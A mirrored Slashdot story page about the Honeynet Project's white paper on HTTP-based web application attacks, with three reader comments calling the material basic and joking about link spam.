Slashdot Mirror

← Back to Stories (view on slashdot.org)

Honeynet Delineates Web Application Threats

Posted by kdawson on from the spider-to-fly dept.

An anonymous reader sends us to a technical white paper written by the Honeynet Project & Research Alliance: Know Your Enemy: Web Application Threats. Based on analysis of malware collected by the project, the paper outlines a number of HTTP-based attacks against web applications and some ways of protecting Web servers. Included are code injection, remote code-inclusion, SQL injection, cross-site scripting, and exploitation of the PHPShell application.

3 of 40 comments (clear)

  1. Hear that understanding? by Anonymous Coward · · Score: 2, Insightful

    Or maybe like the science articles the subject flies over most heads. Just because it's called "news for nerds" doesn't mean that the majority have a nerds understanding. Now the YRO section is more illustrative of what slashdot has become.

    1. Re:Hear that understanding? by Anonymous Coward · · Score: 1, Insightful

      It might have went over non-web developer's heads, I'm not arguing over that (I'd still expect the chair/soviet russia/does it run linux/imagine a beowulf cluster/whatever memes to be here though).

      But for the other part of /.'ers that develop web apps, this stuff is rather obvious. The same old issues:
      -register globals - 'nuff said
      -SQL injection (rather crappy explanation, and an extremely basic one here - there's FAR better articles on this!)
      -people not validating stuff before they use it
      -XSS
      etc.

      Along with the same old attacks we've been seeing in server logs for ages (as long as it's updated and secured properly, it shouldn't be a problem), and more of the TOTALLY obvious (blog comment spam? o rly? people creating accounts for phishing? how surprising!)

      There's really nothing new here at all. And it's all rather basic. There's nothing to argue over.

      If you're a web developer and any of this (basic web app security) is new to you, then your apps shouldn't be exposed to the internet!

      I suppose you're right though. We see a lot more comments when it's about the (RI|MP)AA, DRM, GPL, SCO and the like. Kind of sad IMO. Haven't seen too much good articles in the developer section in a while either... Actually, there hasn't been any interesting articles (or comments to mod up) in the last couple days.

  2. Re:Not malware or a bot, but still an attack. by tooyoung · · Score: 2, Insightful

    How exactly does posting a link 300 times do anything?
    Well, talking about it will give you a nice slashvertisement for Bloomingpedia.org, whatever that is.